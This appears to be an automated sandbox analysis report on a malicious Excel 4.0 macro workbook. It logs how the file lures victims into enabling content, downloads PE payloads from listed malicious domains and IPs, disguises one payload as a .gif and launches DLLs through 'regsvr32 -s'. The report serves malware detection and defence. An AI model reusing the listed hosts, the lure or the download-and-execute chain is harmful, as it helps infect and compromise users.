Analysis Report documents-351331057.xlsm

Overview

General Information

Sample Name: documents-351331057.xlsm
Analysis ID: 384712
MD5: 672eb871d16413c505302778d8bf1cf9
SHA1: f88277af9b7f69e32b3c7cd74f8b25804933c093
SHA256: 17ab700a69c80c034abefa11b191c5ef211f534442c7688256fb200d5b2f25a1
Tags: xlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Office process drops PE file
Allocates a big amount of memory (probably used for heap spraying)
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0

Classification

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 162.251.80.27:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown HTTPS traffic detected: 67.222.38.97:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknown HTTPS traffic detected: 173.201.252.173:443 -> 192.168.2.22:49173 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ghnrope2.dll Jump to behavior
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 0604[1].gif.0.dr Jump to dropped file
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 127MB
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: runolfsson-jayde07s.ru.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 162.251.80.27:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 8.211.4.209:80

Networking:

barindex
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 162.251.80.27 162.251.80.27
Source: Joe Sandbox View IP Address: 8.211.4.209 8.211.4.209
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /ind.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: runolfsson-jayde07s.ru.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ind.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cremin-ian07u.ru.comConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\52523888.png Jump to behavior
Source: global traffic HTTP traffic detected: GET /ind.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: runolfsson-jayde07s.ru.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ind.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cremin-ian07u.ru.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: runolfsson-jayde07s.ru.com
Source: global traffic HTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Fri, 09 Apr 2021 14:44:00 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16X-Powered-By: PHP/5.4.16Content-Length: 76Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Not Found.</h1>The requested URL /ind.html was not found on this server.
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.dr String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000003.00000002.2094330017.0000000001CA0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2094888849.0000000001CD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2095601531.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2096377715.0000000001CF0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2096826781.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown HTTPS traffic detected: 162.251.80.27:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown HTTPS traffic detected: 67.222.38.97:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknown HTTPS traffic detected: 173.201.252.173:443 -> 192.168.2.22:49173 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18
Source: Screenshot number: 4 Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Source: Document image extraction number: 9 Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9 Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Screenshot number: 8 Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 8 Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Found Excel 4.0 Macro with suspicious formulas
Source: documents-351331057.xlsm Initial sample: CALL
Source: documents-351331057.xlsm Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: documents-351331057.xlsm Initial sample: Sheet size: 24417
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ghnrope2.dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0604[1].gif Jump to dropped file
Excel documents contains an embedded macro which executes code when the document is opened
Source: workbook.xml Binary string: " sheetId="6" r:id="rId1"/><sheet name="Doc1" sheetId="4" r:id="rId2"/><sheet name="Doc2" sheetId="1" r:id="rId3"/><sheet name="Doc3" sheetId="5" r:id="rId4"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'Doc1'!$AO$28</definedName></definedNames><calcPr calcId="122211"/></workbook>
Source: classification engine Classification label: mal88.expl.evad.winXLSM@11/18@5/4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$documents-351331057.xlsm Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC3FA.tmp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\ghnrope
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\ghnrope Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: documents-351331057.xlsm Initial sample: OLE zip file path = xl/media/image1.png
Source: documents-351331057.xlsm Initial sample: OLE zip file path = xl/media/image2.png
Source: documents-351331057.xlsm Initial sample: OLE zip file path = xl/media/image3.png
Source: documents-351331057.xlsm Initial sample: OLE zip file path = xl/media/image4.png
Source: documents-351331057.xlsm Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: documents-351331057.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: documents-351331057.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: documents-351331057.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ghnrope2.dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0604[1].gif Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ghnrope2.dll Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0604[1].gif Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ghnrope2.dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\ghnrope2.dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0604[1].gif Jump to dropped file

HIPS / PFW / Operating System Protection Evasion:

barindex
Yara detected Xls With Macro 4.0
Source: Yara match File source: app.xml, type: SAMPLE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 384712 Sample: documents-351331057.xlsm Startdate: 09/04/2021 Architecture: WINDOWS Score: 88 31 Document exploit detected (drops PE files) 2->31 33 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->33 35 Drops PE files to the user root directory 2->35 37 4 other signatures 2->37 6 EXCEL.EXE 88 49 2->6         started        process3 dnsIp4 25 cesiroinsurance.com 67.222.38.97, 443, 49172 UNIFIEDLAYER-AS-1US United States 6->25 27 shalombaptistchapel.com 162.251.80.27, 443, 49169 PUBLIC-DOMAIN-REGISTRYUS United States 6->27 29 3 other IPs or domains 6->29 19 C:\Users\user\ghnrope2.dll, PE32+ 6->19 dropped 21 C:\Users\user\AppData\Local\...\0604[1].gif, PE32+ 6->21 dropped 23 C:\Users\user\...\~$documents-351331057.xlsm, data 6->23 dropped 39 Document exploit detected (creates forbidden files) 6->39 41 Document exploit detected (UrlDownloadToFile) 6->41 11 regsvr32.exe 6->11         started        13 regsvr32.exe 6->13         started        15 regsvr32.exe 6->15         started        17 2 other processes 6->17 file5 signatures6 process7
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
162.251.80.27
 shalombaptistchapel.com United States
394695 PUBLIC-DOMAIN-REGISTRYUS false
67.222.38.97
 cesiroinsurance.com United States
46606 UNIFIEDLAYER-AS-1US false
173.201.252.173
 innermetransformation.com United States
26496 AS-26496-GO-DADDY-COM-LLCUS false
8.211.4.209
 runolfsson-jayde07s.ru.com Singapore
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC false

Contacted Domains

Name IP Active
runolfsson-jayde07s.ru.com 8.211.4.209 true
cremin-ian07u.ru.com 8.211.4.209 true
cesiroinsurance.com 67.222.38.97 true
shalombaptistchapel.com 162.251.80.27 true
innermetransformation.com 173.201.252.173 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://runolfsson-jayde07s.ru.com/ind.html false
  • Avira URL Cloud: safe
 unknown
http://cremin-ian07u.ru.com/ind.html false
  • Avira URL Cloud: safe
 unknown